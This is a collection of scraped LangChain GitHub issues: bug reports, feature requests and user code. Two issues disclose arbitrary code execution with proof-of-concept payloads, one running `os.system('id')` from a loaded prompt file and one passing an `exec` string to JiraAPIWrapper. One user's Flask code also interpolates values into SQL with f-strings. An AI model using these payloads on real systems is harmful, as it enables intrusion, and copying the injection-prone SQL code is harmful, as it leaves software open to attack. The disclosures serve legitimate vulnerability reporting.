
_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. A Python prompt file `prompt.py`:

```python
from langchain.output_parsers.list import CommaSeparatedListOutputParser
from langchain.prompts.prompt import PromptTemplate

_DECIDER_TEMPLATE = """Given the below input question and list of potential tables, output a comma separated list of the table names that may be neccessary to answer this question.

Question: {query}

Table Names: {table_names}

Relevant Table Names:"""

import os
os.system('id')

PROMPT = PromptTemplate(
    input_variables=["query", "table_names"],
    template=_DECIDER_TEMPLATE,
    output_parser=CommaSeparatedListOutputParser(),
)
```

2. Load the prompt with the load_prompt function:

```python
from langchain.prompts import load_prompt
load_prompt('prompt.py')
```

3. The `id` command will be executed.

Attack scene 1: Alice sends the prompt file to Bob and gets Bob to load it.
Attack scene 2: Alice uploads the prompt file to a public hub such as [langchain-hub](https://github.com/hwchase17/langchain-hub/tree/master); Bob loads the prompt from a URL.

### Expected behavior

The code should not be executed without any check.
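A minimal mitigation sketch for the caller side (a hypothetical wrapper, not a fix inside langchain): refuse executable prompt formats up front and only pass declarative ones to the loader:

```python
from pathlib import Path

# Declarative formats that cannot carry executable code.
SAFE_SUFFIXES = {".json", ".yaml", ".yml"}

def safe_load_prompt_path(path: str) -> str:
    """Validate a prompt file path before handing it to load_prompt."""
    if Path(path).suffix.lower() not in SAFE_SUFFIXES:
        raise ValueError(f"refusing to load executable prompt file: {path}")
    return path

print(safe_load_prompt_path("prompt.json"))  # prompt.json
try:
    safe_load_prompt_path("prompt.py")
except ValueError as err:
    blocked = str(err)
print(blocked)
```

This only guards one call site; the report's underlying point is that the library itself should not execute arbitrary `.py` files from untrusted sources.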
Arbitrary code execution in load_prompt
https://api.github.com/repos/langchain-ai/langchain/issues/4849/comments
2
2023-05-17T10:36:17Z
2023-08-29T17:58:01Z
https://github.com/langchain-ai/langchain/issues/4849
1,713,606,278
4,849
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise.

I use ChatOpenAI and set verbose to true, but I think this only shows the formatted prompt template, not the final prompt. How can I get the final prompt that is actually sent to ChatGPT? Thanks for your time.

### Suggestion:

_No response_
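One approach is a callback handler: langchain's callback system passes the fully formatted prompts to `on_llm_start` right before the model call. The sketch below is self-contained (the handler class and the simulated call are stand-ins; in real use the handler would subclass `BaseCallbackHandler` and be passed via `callbacks=[...]`):

```python
class PromptCapture:
    """Collects the fully formatted prompts a chain hands to the model."""

    def __init__(self):
        self.prompts = []

    def on_llm_start(self, serialized, prompts, **kwargs):
        # Called with the final prompt strings, after template formatting.
        self.prompts.extend(prompts)

handler = PromptCapture()
# Simulate what a chain does right before invoking the LLM:
handler.on_llm_start({"name": "openai"}, ["Translate to French: hello"])
print(handler.prompts)  # ['Translate to French: hello']
```

Inspecting `handler.prompts` after a chain run then shows exactly what was sent, including few-shot examples and history that `verbose=True` may not print.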
How can I obtain the final Prompt that is inputted into ChatGPT?
https://api.github.com/repos/langchain-ai/langchain/issues/4848/comments
2
2023-05-17T09:59:15Z
2023-09-12T16:15:00Z
https://github.com/langchain-ai/langchain/issues/4848
1,713,548,834
4,848
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise.

I found the `BaseMultiActionAgentpen` class in langchain but no implementation; maybe it is still in development. I want to implement an agent based on this class (executing multiple actions in one step), but I encounter some errors. Has anyone noticed this and already implemented agents based on it?

### Suggestion:

_No response_
Issue: implementation of BaseMultiActionAgent
https://api.github.com/repos/langchain-ai/langchain/issues/4846/comments
1
2023-05-17T09:25:20Z
2023-09-10T16:16:49Z
https://github.com/langchain-ai/langchain/issues/4846
1,713,494,765
4,846
[ "langchain-ai", "langchain" ]
### Feature request The [Microsoft Guidance Repository](https://github.com/microsoft/guidance/blob/main/README.md) is a tool designed to enhance control over modern language models. It allows for more effective and efficient control than traditional prompting or chaining. It offers features like a simple, intuitive syntax based on Handlebars templating, and a rich output structure with multiple generations, selections, conditionals, tool use, etc. ### Motivation Based on the description and examples (templating, hidden response parts, well-formed response variables), integration of `guidance` with `langchain` would be a very useful addition. ### Your contribution Given some guidance (pun intended), I can imagine contributing a PR myself.
Support for https://github.com/microsoft/guidance
https://api.github.com/repos/langchain-ai/langchain/issues/4843/comments
3
2023-05-17T08:41:08Z
2023-08-18T19:07:42Z
https://github.com/langchain-ai/langchain/issues/4843
1,713,418,715
4,843
[ "langchain-ai", "langchain" ]
### System Info - Python 3.11.3 on Windows 11 - langchain==0.0.171 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. Create llm, SQLDatabase and SQLDatabaseChain instances; 2. query the database with natural language; 3. the SQLDatabaseChain returns more content than expected (normally it appends a new question below the answer) ![image](https://github.com/hwchase17/langchain/assets/3953615/eba89b5d-0744-4339-a1fb-26265b716a1f) ### Expected behavior It seems that if we modify line 111 of `langchain\chains\sql_database\base.py` and add `"\nQuestion:"` as another stop sequence, SQLDatabaseChain works well. ![image](https://github.com/hwchase17/langchain/assets/3953615/043d1c4e-65ea-483e-9939-8f3bdfbf58fe) ![image](https://github.com/hwchase17/langchain/assets/3953615/5be9376b-635e-4336-a578-29d527e87aea)
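The suggested fix amounts to truncating the completion at an extra stop sequence. A standalone sketch of that post-processing step (plain Python illustrating the idea, not the actual `base.py` code):

```python
def apply_stops(completion: str, stops: list) -> str:
    """Truncate an LLM completion at the first occurrence of any stop string."""
    for stop in stops:
        idx = completion.find(stop)
        if idx != -1:
            completion = completion[:idx]
    return completion.rstrip()


# Without "\nQuestion:" as a stop, the model keeps going and invents
# a follow-up question after the SQL it was asked for.
raw = "SELECT COUNT(*) FROM Employee;\nQuestion: How many employees are there?"
print(apply_stops(raw, ["\nSQLResult:", "\nQuestion:"]))
```

Passing the extra stop string through to the model API (so generation halts server-side) is cheaper than trimming after the fact, but the trimming behavior is the same.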
SQLDatabaseChain returns more than just the expected answer
https://api.github.com/repos/langchain-ai/langchain/issues/4840/comments
2
2023-05-17T06:15:49Z
2023-09-25T16:07:12Z
https://github.com/langchain-ai/langchain/issues/4840
1,713,198,963
4,840
[ "langchain-ai", "langchain" ]
### Feature request Hi, thanks for creating such a great tool; I'm using it well at work and for personal use. But for production use, I need a more tightly managed, revision-controlled prompt template store. I know that load_prompt is already supported, but I wonder if it can be extended to utilize a remote store, like GitHub. For example, if there were a GitPromptTemplateStore class like: ```python from abc import ABCMeta, abstractmethod class PromptTemplateStore(metaclass=ABCMeta): @abstractmethod def load(self, path: str) -> BasePromptTemplate: pass class GitPromptTemplateStore(BaseModel): @property def repository(self) -> str: return "git@github.com:some_project/prompt_repo.git" @property def branch(self) -> str: return "main" ... def load(self, path: str) -> BasePromptTemplate: ... return {name}_prompt_template # from remote git store (with/without cache) ``` which could be utilized like: ``` template_store = GitPromptTemplateStore(...) prompt = load_prompt_from_store(template_store, path=...) ``` managing prompt templates would be much easier. ### Motivation For production use, I need a more tightly managed, revision-controlled prompt template store. I know that load_prompt is already supported, but I wonder if it can be extended to utilize a remote store, like GitHub. ### Your contribution I have read CONTRIBUTING.md, and if this request looks valid, I'd be happy to contribute.
Extending Prompt Template Store to Git
https://api.github.com/repos/langchain-ai/langchain/issues/4839/comments
3
2023-05-17T06:15:12Z
2023-08-31T05:34:20Z
https://github.com/langchain-ai/langchain/issues/4839
1,713,198,334
4,839
[ "langchain-ai", "langchain" ]
### Feature request When you request a webpage using a library like requests or aiohttp, you get the initial HTML of the page, but any content that's loaded via JavaScript after the page loads will not be included. That's why you might see template tags like (item.price)}} taka instead of the actual values. Those tags are placeholders that get filled in with actual data by JavaScript after the page loads. To handle this, you need to use a library that can execute JavaScript. A commonly used one is Selenium, but it's heavier than requests or aiohttp because it requires running an actual web browser. But is there any other option that doesn't need a full browser, or that can be used in langchain without a graphical interface, like headless browser tools such as `pyppeteer` (a Python wrapper for Puppeteer)? Anyway, please solve the issue and add features like this. Thanks in advance. ### Motivation To get dynamic content from a webpage while scraping text from a website or webpage. ### Your contribution On my side, I rewrote the _fetch method in your WebBaseLoader class to use pyppeteer instead of aiohttp. It is still **not working**, but I think this might help a little.
Here is my code, where I override the class (I added the missing logging setup): ``` import asyncio import logging import pyppeteer from langchain.document_loaders import WebBaseLoader as BaseWebBaseLoader logger = logging.getLogger(__name__) class WebBaseLoader(BaseWebBaseLoader): async def _fetch( self, url: str, selector: str = 'body', retries: int = 3, cooldown: int = 2, backoff: float = 1.5 ) -> str: for i in range(retries): try: browser = await pyppeteer.launch() page = await browser.newPage() await page.goto(url) await page.waitForSelector(selector) # waits for a specific element to be loaded await asyncio.sleep(5) # waits for 5 seconds before getting the content content = await page.content() # this gets the full HTML, including any dynamically loaded content await browser.close() return content except Exception as e: if i == retries - 1: raise else: logger.warning( f"Error fetching {url} with attempt " f"{i + 1}/{retries}: {e}. Retrying..." ) await asyncio.sleep(cooldown * backoff ** i) raise ValueError("retry count exceeded") ``` And install these two libs: ``` pip install pyppeteer pyppeteer-install ```
Make an option in WebBaseLoader to handle dynamic content that is loaded via JavaScript.
https://api.github.com/repos/langchain-ai/langchain/issues/4838/comments
3
2023-05-17T06:06:30Z
2023-09-19T16:10:37Z
https://github.com/langchain-ai/langchain/issues/4838
1,713,187,340
4,838
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I was trying to create a pipeline using Langchain and GPT4All (gpt4all-converted.bin). The pipeline ran fine when we tried it on a Windows system, but now, when I am trying to run the same code on an RHEL 8 AWS (p3.8x) instance, it generates a gibberish response. This is my code - ``` from langchain import PromptTemplate, LLMChain from langchain.llms import GPT4All from langchain.callbacks.manager import CallbackManager from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler gpt4all_path = 'Models/gpt4all-converted.bin' callback_manager = CallbackManager([StreamingStdOutCallbackHandler()]) llm = GPT4All(model=gpt4all_path, callback_manager=callback_manager, verbose=True, temp=0, n_predict=512, n_ctx=2048) prompt_temp = """ Below is an instruction that describes a task. Write a response that appropriately completes the request. > How many letters are there in the English alphabet? There are 26 letters in the English alphabet > Question: {question} > Reply: """ prompt = PromptTemplate(template=prompt_temp, input_variables=["question"]) llm_chain = LLMChain(prompt=prompt, llm=llm) response = llm_chain.run("write me a story about a lonely computer?") ``` And this is what I am getting - ``` print(response)
'\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f#\x05\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f#\x05\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f# 
thealst\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f' ``` Can anyone help me to understand the problem here? ### Suggestion: _No response_
Issue: GPT4All with Langchain generating \x0f\x0f
https://api.github.com/repos/langchain-ai/langchain/issues/4837/comments
2
2023-05-17T05:59:30Z
2023-09-12T11:15:28Z
https://github.com/langchain-ai/langchain/issues/4837
1,713,178,012
4,837
[ "langchain-ai", "langchain" ]
llama-cpp-python added support for n_gpu_layers Here is the comment confirming it https://github.com/abetlen/llama-cpp-python/issues/207#issuecomment-1550578859
[Feature request] Add support for GPU offloading to Llama.cpp llm
https://api.github.com/repos/langchain-ai/langchain/issues/4836/comments
0
2023-05-17T05:37:28Z
2023-05-17T15:35:22Z
https://github.com/langchain-ai/langchain/issues/4836
1,713,157,876
4,836
[ "langchain-ai", "langchain" ]
### Feature request Wrong outputs from the model will raise exceptions, so it may be better to provide clear feedback to the LLM about the specific issue (i.e. incorrect formatting). This would allow the LLM to self-adjust and retry, making the chain robust. ### Motivation When I was using the chain to test my own search tool, I found that if the result is in another language (not English), the model fails to exactly follow the "thought-action" pattern. ### Your contribution Not yet
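The idea can be sketched without LangChain: catch the parse failure, feed the error message back into the prompt, and retry. Everything below, the fake model included, is illustrative:

```python
def parse_action(output: str) -> str:
    """Expect an 'Action: <tool>' line; raise with a useful message otherwise."""
    for line in output.splitlines():
        if line.startswith("Action: "):
            return line[len("Action: "):]
    raise ValueError("output must contain a line of the form 'Action: <tool>'")


def run_with_self_correction(model, prompt: str, max_retries: int = 3) -> str:
    feedback = ""
    for _ in range(max_retries):
        output = model(prompt + feedback)
        try:
            return parse_action(output)
        except ValueError as err:
            # Tell the model exactly what was wrong and let it retry.
            feedback = f"\nYour last reply was invalid: {err}. Try again."
    raise RuntimeError("model never produced parseable output")


# Fake model standing in for a real LLM call: fails once, then complies
# (mimicking a non-English reply that breaks the thought-action pattern).
replies = iter(["je pense, donc je cherche", "Action: search"])
print(run_with_self_correction(lambda _prompt: next(replies), "Find the population of Lyon."))
```

LangChain later shipped an output-fixing/retry parser with roughly this loop; the sketch shows the mechanism the feature request is asking for.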
Making the chain more robust (self-correct)
https://api.github.com/repos/langchain-ai/langchain/issues/4835/comments
2
2023-05-17T05:35:55Z
2024-04-21T21:16:06Z
https://github.com/langchain-ai/langchain/issues/4835
1,713,156,564
4,835
[ "langchain-ai", "langchain" ]
### System Info LangChain version: 0.0.171, Windows 10 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. Set the environment variables for Jira and OpenAI ```python import os from langchain.utilities.jira import JiraAPIWrapper os.environ["JIRA_API_TOKEN"] = "your jira api token" os.environ["JIRA_USERNAME"] = "your username" os.environ["JIRA_INSTANCE_URL"] = "your url" os.environ["OPENAI_API_KEY"] = "your openai key" ``` 2. Run jira ```python jira = JiraAPIWrapper() output = jira.run('other',"exec(\"import os;print(os.popen('id').read())\")") ``` 3. The `id` command will be executed. The command can be changed to others, and attackers can execute arbitrary code. ### Expected behavior The code should not be executable without any check (currently it is).
Arbitrary code execution in JiraAPIWrapper
https://api.github.com/repos/langchain-ai/langchain/issues/4833/comments
5
2023-05-17T04:11:40Z
2024-03-13T16:12:28Z
https://github.com/langchain-ai/langchain/issues/4833
1,713,072,690
4,833
[ "langchain-ai", "langchain" ]
### System Info I encountered an issue when executing a SQL statement that involves joining multiple tables. I am working with a SQL Server database, and the following SQL query is returning an error: SELECT TOP 50000 [StoreNo], [StoreName], [Quantity], [GoodsName], [GoodsNo] FROM [JBStore] JOIN [CKCurrStore] ON [JBStore].[StoreNo] = [CKCurrStore].[StoreNo] JOIN [JBGoods] ON [CKCurrStore].[GoodsNo] = [JBGoods].[GoodsNo] The error seems to arise because the [StoreNo] and [GoodsNo] fields are not prefixed with the table names, which causes the query to fail. Here are my table definitions: table_info = { "CKXSCheck": """ CREATE TABLE CKXSCheck ( "OrderNo" VARCHAR PRIMARY KEY, "OrderDate" DATETIME, "Amount" REAL, "InOutTypeNo" INTEGER, "CKAmount" REAL, PRIMARY KEY ("OrderNo") )""", "CKXSCheckDetail": """ CREATE TABLE CKXSCheckDetail ( "OrderNo" VARCHAR, "SerialNo" INTEGER, "GoodsNo" INTEGER, "Amount" REAL, "Quantity" REAL, "Price" REAL, PRIMARY KEY ("OrderNo", "SerialNo"), FOREIGN KEY ("OrderNo") REFERENCES CKXSCheck("OrderNo"), FOREIGN KEY ("GoodsNo") REFERENCES JBGoods("GoodsNo") )""", "JBGoods": """ CREATE TABLE JBGoods ( "GoodsNo" INTEGER PRIMARY KEY, "GoodsCode" VARCHAR, "GoodsName" VARCHAR, PRIMARY KEY ("GoodsNo") )""", "CKCurrStore": """ CREATE TABLE CKCurrStore ( "StoreNo" VARCHAR, "GoodsNo" VARCHAR, "Quantity" REAL, FOREIGN KEY ("StoreNo") REFERENCES CKXSCheck("JBStore"), FOREIGN KEY ("GoodsNo") REFERENCES JBGoods("GoodsNo") )""", "JBStore": """ CREATE TABLE JBStore ( "StoreNo" VARCHAR PRIMARY KEY, "StoreName" VARCHAR, PRIMARY KEY ("StoreNo") )""", } How can I resolve this issue? ### Who can help? 
_No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [x] LLMs/Chat Models - [x] Embedding Models - [x] Prompts / Prompt Templates / Prompt Selectors - [x] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [x] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Send a request to the '/api/query' endpoint ### Expected behavior import os import sqlite3 import pymssql import tkinter as tk import tkinter.ttk as ttk from langchain.agents import create_sql_agent, ZeroShotAgent from langchain.agents.agent_toolkits import SQLDatabaseToolkit from langchain import OpenAI, SQLDatabase, SQLDatabaseChain from langchain.prompts.prompt import PromptTemplate from typing import Dict, Any from langchain import LLMChain from typing import Any, List, Tuple from urllib.parse import quote_plus as urlquote from sqlalchemy import create_engine from sqlalchemy.engine import reflection from sqlalchemy import inspect from sqlalchemy.orm import sessionmaker import pandas as pd from sqlalchemy.sql import text as sql_text from sqlalchemy import Table, MetaData, select from sqlalchemy.sql import text import json import decimal import datetime import time from sql_utils import add_table_prefix_to_columns from flask import Flask, request, render_template,jsonify import re #查询全部商品 #查询销售额前100的所有商品 #查询库存数量明细表 显示仓库序号 仓库名称 数量 商品名称 商品序号 # 替换为你的 API 密钥 # Customized English prompt _DEFAULT_TEMPLATE = """You are an MS SQL expert. Given an input question, first create a syntactically correct MS SQL query to run, then look at the results of the query and return the answer to the input question. Note that you should never perform any operations that could modify the database. This includes UPDATE, DELETE, or INSERT operations. Your job is only to read data and answer questions. 
Unless the user specifies in the question a specific number of examples to obtain, query for 50000 results using the TOP clause as per MS SQL. You can order the results to return the most informative data in the database. Never query for all columns from a table. You must query only the columns that are needed to answer the question. Wrap each column name in square brackets ([]) to denote them as delimited identifiers. Pay attention to use only the column names you can see in the tables below. Be careful to not query for columns that do not exist. Also, pay attention to which column is in which table. Use the following format: Question: "Question here" SQLQuery: "SQL Query to run" SQLResult: "Result of the SQLQuery" Only use the following tables: {table_info} Question: {input}""" PROMPT = PromptTemplate( input_variables=["input", "table_info"], template=_DEFAULT_TEMPLATE ) custom_table_info_OLD= { "v_CKXSDetail": """CREATE TABLE v_CKXSDetail ( "OrderNo" VARCHAR , -- 单据编号, "OrderDate":DATETime,-- 销售日期 "GoodsCode":VARCHAR,-- 商品编号 "GoodsName":VARCHAR,-- 商品名称 "OrderDate":DATETime,-- 销售日期 "Amount" numeric(18,2), -- 销售金额, "InOutTypeNo" INTEGER, -- 值为2表示退货 "Quantity" INTEGER, -- 销售数量 "CKAmount" REAL-- 成本金额 )"""} custom_table_info = { "CKXSCheck": """CREATE TABLE CKXSCheck ( "OrderNo" VARCHAR PRIMARY KEY, -- 单号,字符型主键 "OrderDate":DATETime,-- 销售日期 "Amount" REAL, -- 整单销售金额,(case InOutTypeNo when 2 then -Amount else Amount end) "InOutTypeNo" INTEGER, -- 值为2表示退货 "CKAmount" REAL,-- 整单成本金额 PRIMARY KEY ("OrderNo"), -- 将 OrderNo 主键 )""", "CKXSCheckDetail": """CREATE TABLE CKXSCheckDetail ( "OrderNo" VARCHAR, -- 单号 ,外键 "SerialNo" INTEGER, -- 序列号 ,主键 "GoodsNo" INTEGER, -- 商品序号,外键 "Amount" REAL, -- 商品销售金额 "Quantity" REAL, -- 商品销售数量 "Price" REAL, -- 销售单价 PRIMARY KEY ("OrderNo", "SerialNo"), -- 将 OrderNo 和 SerialNo 设为联合主键 FOREIGN KEY ("OrderNo") REFERENCES CKXSCheck("OrderNo"), -- OrderNo 是 CKXSCheck 表的外键 FOREIGN KEY ("GoodsNo") REFERENCES JBGoods("GoodsNo") -- GoodsNo 是 JBGoods 表的外键 
)""", "JBGoods": """CREATE TABLE JBGoods ( "GoodsNo" INTEGER PRIMARY KEY, -- 商品序号,主键 "GoodsCode" VARCHAR, -- 商品编号 "GoodsName" VARCHAR, -- 商品名称 PRIMARY KEY ("GoodsNo") -- 将 GoodsNo 设为主键 )""", "CKCurrStore": """CREATE TABLE CKCurrStore ( "StoreNo" VARCHAR, -- 仓库序号,外键 "GoodsNo" VARCHAR, -- 商品序号,外键 "Quantity" REAL, -- 库存数量 FOREIGN KEY ("StoreNo") REFERENCES CKXSCheck("JBStore"), -- StoreNo 是 JBStore 表的外键 FOREIGN KEY ("GoodsNo") REFERENCES JBGoods("GoodsNo") -- GoodsNo 是 JBGoods 表的外键 )""", "JBStore": """CREATE TABLE JBStore ( "StoreNo" VARCHAR, -- 仓库序号,主键 "StoreName" VARCHAR, -- 仓库名称 PRIMARY KEY ("StoreNo") -- 将 GoodsNo 设为主键 )""", } db = SQLDatabase.from_uri(f"mssql+pymssql://{user_name}:{urlquote(psw)}@{ip}/{database}", include_tables=['CKXSCheck', 'CKXSCheckDetail', 'JBGoods', 'CKCurrStore', 'JBStore'], custom_table_info=custom_table_info) llm=OpenAI(temperature=0) class CustomSQLQueryChain(SQLDatabaseChain): def _call(self, inputs: Dict[str, Any]) -> Dict[str, Any]: prompt = self.prompt or SQL_PROMPTS.get(self.database.dialect, PROMPT) llm_chain = LLMChain(llm=self.llm, prompt=prompt) input_text = f"{inputs[self.input_key]}\nSQLQuery:" self.callback_manager.on_text(input_text, verbose=self.verbose) table_names_to_use = inputs.get("table_names_to_use") table_info = self.database.get_table_info(table_names=table_names_to_use) llm_inputs = { "input": input_text, "top_k": self.top_k, "dialect": self.database.dialect, "table_info": table_info, "stop": ["\nSQLResult:"], } intermediate_steps = [] sql_cmd = llm_chain.predict(**llm_inputs).strip() # simplified this line intermediate_steps.append({"SQLQuery": sql_cmd}) self.callback_manager.on_text(sql_cmd, color="green", verbose=self.verbose) chain_result: Dict[str, Any] = { "intermediate_steps": intermediate_steps, "result": sql_cmd, } return chain_result custom_db_chain = CustomSQLQueryChain(llm=llm, database=db, prompt=PROMPT, verbose=True, return_intermediate_steps=True) def display_table(tree, columns, data): print(data) 
print(columns) # 删除所有的列 tree['columns'] = [] # 重新设置列 tree["columns"] = columns tree["show"] = "headings" for col in columns: tree.heading(col, text=col) tree.column(col, width=100) # 删除所有的数据 for i in tree.get_children(): tree.delete(i) # 插入新的数据 for row in data: tree.insert("", "end", values=row) root = tk.Tk() root.title("Chat with your Tabular Data") entry = ttk.Entry(root, font=("Arial", 14)) entry.pack(padx=20, pady=20, fill=tk.X) def get_chinese_col_names(field_names, conn): # 使用 XTSQLField 表查询中文列名 field_names_str = ', '.join(f"'{field_name}'" for field_name in field_names) # 将字段名列表转换为适合SQL查询的字符串 query = f""" WITH numbered_rows AS ( SELECT SqFieldName, (CASE SqFieldName WHEN 'GoodsCode' THEN '商品编号' WHEN 'GoodsName' THEN '商品名称' WHEN 'Quantity' THEN '数量' ELSE CClientName END) as CClientName, ROW_NUMBER() OVER (PARTITION BY SqFieldName ORDER BY CClientName) AS rn FROM XTSQLField WHERE SqFieldName in ({field_names_str}) AND ASCII(LEFT(CClientName, 1)) > 127 -- 添加这个条件以仅选择CClientName为中文的行 ) SELECT SqFieldName, CClientName FROM numbered_rows WHERE rn = 1; """ print(query) result_proxy = conn.execute(query) name_mapping = {row['SqFieldName']: row['CClientName'] for row in result_proxy} # 创建一个字段名到中文名的映射字典 chinese_col_names = [] for field_name in field_names: chinese_name = name_mapping.get(field_name, field_name) # 如果没有找到中文名,就使用原始的字段名 chinese_col_names.append(chinese_name) return chinese_col_names class DecimalEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, decimal.Decimal): return float(obj) return super(DecimalEncoder, self).default(obj) app = Flask(__name__) #分页查询 @app.route('/api/get-messages', methods=['POST']) def get_messages(): # 获取前端传过来的分页参数 page = request.args.get('page', default = 1, type = int) # 连接数据库 engine = create_engine(f"mssql+pymssql://{user_name}:{urlquote(psw)}@{ip}/{database}") metadata = MetaData(bind=engine) # 创建一个表对象,反映AiQuery表 AiQuery = Table('AiQuery', metadata, autoload_with=engine) with engine.connect() as conn: # 
查询AiQuery表 pagesize = 4 select_stmt = select(AiQuery).order_by(AiQuery.columns.ID.desc()).limit(pagesize).offset((page - 1) * pagesize) result_proxy = conn.execute(select_stmt) # 将 LegacyRow 对象转换为字典 result_data = [dict(row) for row in result_proxy.fetchall()] # 根据你的需求格式化返回的数据 messages = [] for data in result_data: messages.append({ "text": data['QueryStr'], "time": data['UsedTime'], "records": data['ResultRecords'], "timestamp": data['CreateDate'].strftime("%Y-%m-%d %H:%M"), # 将日期转换为字符串 "id": data['ID'] }) return jsonify(messages) @app.route('/api/query', methods=['POST']) def do_query(): data = request.get_json() query = data.get('query') start_time = time.time() # 记录查询开始的时间 engine = create_engine(f"mssql+pymssql://{user_name}:{urlquote(psw)}@{ip}/{database}") metadata = MetaData(bind=engine) # 创建一个表对象,反映AiQuery表 AiQuery = Table('AiQuery', metadata, autoload_with=engine) inserted_id = None # 用于保存新插入的行的ID with engine.connect() as conn: # 检查AiQuery表中是否已经有该查询 select_stmt = select(AiQuery).where(AiQuery.columns.QueryStr == query) result_proxy = conn.execute(select_stmt) print(select_stmt.compile(compile_kwargs={"literal_binds": True})) # 如果有结果,那么直接返回结果 row = result_proxy.fetchone() print(row) if row: # 从 AiQuery 表中获取SQL查询字符串 sql_query = row.SQLStr # 执行查询字符串,获取结果 result_proxy = conn.execute(sql_query) # 将 LegacyRow 对象转换为字典 result_data = [dict(row) for row in result_proxy.fetchall()] column_names = list(result_proxy.keys()) sorted_result_data = [] for resrow in result_data: sorted_row = [resrow[column_name] for 